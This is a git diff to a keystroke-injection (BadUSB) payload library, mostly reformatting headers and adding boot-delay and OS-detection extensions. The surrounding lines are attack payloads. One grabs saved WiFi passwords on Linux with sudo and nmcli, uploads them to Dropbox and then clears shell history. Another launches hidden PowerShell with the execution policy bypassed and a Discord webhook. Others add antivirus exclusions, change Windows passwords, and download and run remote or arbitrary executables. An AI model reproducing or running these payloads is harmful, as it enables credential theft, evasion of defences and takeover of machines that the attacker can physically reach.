diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
index bb5b1b6..3186ee3 100644
--- a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
+++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
@@ -1,27 +1,53 @@
-REM #######################################################
-REM # |
-REM # Title : Exfiltrate Wifi Passwords - Linux |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Credentials, Execution |
-REM # Target : Linux |
-REM # |
-REM #######################################################
+REM_BLOCK
+#######################################################
+# #
+# Title : Exfiltrate Wifi Passwords - Linux #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Credentials, Execution #
+# Target : Linux #
+# #
+#######################################################
+END_REM
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### PREREQUISITES SECTION ####
-
-
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
@@ -41,8 +67,6 @@ ENTER
REM #### ZIP SECTION ####
-
-
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
@@ -61,8 +85,6 @@ ENTER
REM #### WiFi && ZIP SECTION ####
-
-
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
@@ -85,8 +107,6 @@ DELAY 3000
REM #### EXFILTRATE SECTION ####
-
-
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
@@ -105,8 +125,6 @@ ENTER
REM #### REMOVE TRACES ####
-
-
DELAY 2000
STRING history -c
ENTER
diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
index 379fe45..4b92997 100644
--- a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
@@ -10,8 +10,49 @@ REM # |
REM ###################################################################
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
diff --git a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
index 550a2c5..c4b9907 100644
--- a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
+++ b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
@@ -1,24 +1,65 @@
-REM ########################################################
-REM # |
-REM # Title : Add An Exception To Avast Antivirus |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Add An Exception To Avast Antivirus #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Avast installed and configured
-
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Avast application
-DELAY 2000
GUI
DELAY 1000
STRING avast
diff --git a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
index a44c42a..10174db 100644
--- a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
+++ b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
@@ -1,13 +1,14 @@
-REM ##############################################
-REM # |
-REM # Title : Call Someone On An iPhone |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : iPhone |
-REM # |
-REM ##############################################
-
+REM_BLOCK
+##############################################
+# |
+# Title : Call Someone On An iPhone |
+# Author : Aleff |
+# Version : 1.0 |
+# Category : Execution |
+# Target : iPhone |
+# |
+##############################################
+END_REM
REM Requirements:
REM - The phone must be unlocked
diff --git a/payloads/library/execution/ChangeGitRemoteLink/payload.txt b/payloads/library/execution/ChangeGitRemoteLink/payload.txt
index eafac41..0348ece 100644
--- a/payloads/library/execution/ChangeGitRemoteLink/payload.txt
+++ b/payloads/library/execution/ChangeGitRemoteLink/payload.txt
@@ -1,12 +1,14 @@
-REM ###########################################
-REM # |
-REM # Title : Change Remote Git Link |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11/Linux |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Remote Git Link #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11/Linux #
+# #
+###########################################
+END_REM
REM Requirements:
REM - Internet Connection
diff --git a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
index e0c538f..3130f0d 100644
--- a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
+++ b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
@@ -1,25 +1,50 @@
-
-REM ###########################################
-REM # |
-REM # Title : Change Linux MAC Address |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Linux MAC Address #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+###########################################
+END_REM
REM Requirements:
REM - Permissions
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
index af732aa..60502ad 100644
--- a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
+++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
@@ -1,25 +1,49 @@
-
-REM ###############################################
-REM # |
-REM # Title : Change Network Configuration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ###############################################
+REM_BLOCK
+###############################################
+# #
+# Title : Change Network Configuration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+###############################################
+END_REM
REM Requirements:
REM - Permissions
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
diff --git a/payloads/library/execution/Change_Windows_User_Name/payload.txt b/payloads/library/execution/Change_Windows_User_Name/payload.txt
index d0d566d..5b1d685 100644
--- a/payloads/library/execution/Change_Windows_User_Name/payload.txt
+++ b/payloads/library/execution/Change_Windows_User_Name/payload.txt
@@ -1,12 +1,14 @@
-REM #############################################
-REM # |
-REM # Title : Change Windows User Name |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM #############################################
+REM_BLOCK
+#############################################
+# #
+# Title : Change Windows User Name #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+#############################################
+END_REM
REM Requirements:
REM - Nothing
@@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set
DEFINE NEW_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
REM Open Windows research
-DELAY 2000
GUI
DELAY 1000
diff --git a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
index 87e22c8..a85a629 100644
--- a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
+++ b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # |
-REM # Title : Change the password of the Windows user |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Change the password of the Windows user #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Nothing (i know it's absurd)
@@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
REM You must define the new Windows user password
DEFINE NEW_PASSWORD example
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/README.md b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
index 8fb34f0..c512577 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/README.md
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
@@ -1,4 +1,4 @@
-# Close All Applications - BADUSB ✅
+# Close All Applications
A script used to close all target open applications.
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
index 5c1bd2a..eab598e 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
@@ -1,27 +1,69 @@
-REM #####################################################
-REM # |
-REM # Title : Close All Applications |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #####################################################
+REM_BLOCK
+#####################################################
+# #
+# Title : Close All Applications #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+#####################################################
+END_REM
REM Plug-And-Play
-REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
-REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHEL_CODE example.com
-DELAY 2000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 250
DOWNARROW
diff --git a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
index e109d55..0729d4d 100644
--- a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
+++ b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # #
-REM # Title : Defend yourself against AtlasVPN Bug-Door #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Defend yourself against AtlasVPN Bug-Door #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Administrator Permission
@@ -15,7 +17,34 @@ REM - AtlasVPN installed
REM Define the sudo user password
DEFINE #SUDO-PWS example
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
index 0a863ff..c3c6684 100644
--- a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
+++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
@@ -1,14 +1,14 @@
-
-REM ################################################################
-REM # |
-REM # Title : Edit The Default Real App With An Arbitrary |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : GNU/Linux (Debian based tested) |
-REM # |
-REM ################################################################
-
+REM_BLOCK
+################################################################
+# #
+# Title : Edit The Default Real App With An Arbitrary #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : GNU/Linux (Debian based tested) #
+# #
+################################################################
+END_REM
REM Requirements:
REM - sudo permissions
@@ -16,11 +16,9 @@ REM - Internet connection
REM - Executable app
REM - '.desktop' file
-
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
-
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
@@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
REM Open a shell
-DELAY 2000
CTRL-ALT t
DELAY 1000
diff --git a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
index 8aa455d..0d30273 100644
--- a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
+++ b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
@@ -1,25 +1,50 @@
-
-REM ################################################
-REM # |
-REM # Title : Exploiting An Executable File |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ################################################
+REM_BLOCK
+################################################
+# #
+# Title : Exploiting An Executable File #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+################################################
+END_REM
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### Script ####
-
-
STRINGLN
function search_file {
for file in "$1"/*; do
diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
index 4979471..3929e47 100644
--- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
+++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
@@ -108,18 +108,12 @@ Happy Hacking!
Github
-
-
-
-
- Instagram
- |
- Discord
+ Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
index 80b90cb..3edb530 100644
--- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
+++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
@@ -1,27 +1,67 @@
-REM ###########################################################################################
-REM # |
-REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###########################################################################################
-
+REM_BLOCK
+###########################################################################################
+# #
+# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+###########################################################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM Define here your hexadecimal code
DEFINE #HEX_CODE example
-
REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 1000
STRINGLN notepad.exe
diff --git a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
index 1ed9ed8..12813ca 100644
--- a/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
+++ b/payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
@@ -1,12 +1,14 @@
-REM ##################################################################
-REM # |
-REM # Title : Make Windows performant (but ugly and boring) |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ##################################################################
+REM_BLOCK
+##################################################################
+# #
+# Title : Make Windows performant (but ugly and boring) #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+##################################################################
+END_REM
REM Plug-And-Play <3
@@ -16,7 +18,48 @@ REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
